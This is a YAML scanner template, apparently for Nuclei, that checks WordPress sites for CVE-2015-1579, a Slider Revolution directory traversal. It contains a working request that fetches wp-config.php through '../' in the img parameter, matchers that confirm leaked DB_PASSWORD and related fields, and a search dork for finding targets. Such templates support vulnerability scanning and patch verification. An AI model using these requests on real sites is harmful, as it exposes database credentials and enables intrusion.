id: CVE-2015-1579 info: name: WordPress Slider Revolution - Local File Disclosure author: pussycat0x severity: medium description: | Directory traversal vulnerability in the Elegant Themes Divi theme for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the img parameter in a revslider_show_image action to wp-admin/admin-ajax.php. NOTE: this vulnerability may be a duplicate of CVE-2014-9734. remediation: | Update the WordPress Slider Revolution plugin to the latest version to fix the vulnerability. reference: - https://blog.sucuri.net/2014/09/slider-revolution-plugin-critical-vulnerability-being-exploited.html - https://cxsecurity.com/issue/WLB-2021090129 - https://wpscan.com/vulnerability/4b077805-5dc0-4172-970e-cc3d67964f80 - https://nvd.nist.gov/vuln/detail/CVE-2015-1579 - https://wpvulndb.com/vulnerabilities/7540 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2015-1579 cwe-id: CWE-22 epss-score: 0.92959 epss-percentile: 0.98736 cpe: cpe:2.3:a:elegant_themes:divi:-:*:*:*:*:wordpress:*:* metadata: max-request: 2 vendor: elegant_themes product: divi framework: wordpress google-query: inurl:/wp-content/plugins/revslider tags: wordpress,wp-plugin,lfi,revslider,wp,wpscan,cve,cve2015 http: - method: GET path: - '{{BaseURL}}/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php' - '{{BaseURL}}/blog/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php' stop-at-first-match: true matchers-condition: and matchers: - type: word part: body words: - "'DB_NAME'" - "'DB_PASSWORD'" - "'DB_USER'" condition: and - type: status status: - 200 # digest: 490a004630440220283bea73bc43aea01220c316dcb952ae233a48b2ed94e7df8a967c5e5d8a8717022027ac5679f0c128c6b99c7ad5ea596ac8b12ac8ebb902ea272ce017104cd7bdc9:922c64590222798bb761d5b6d8e72950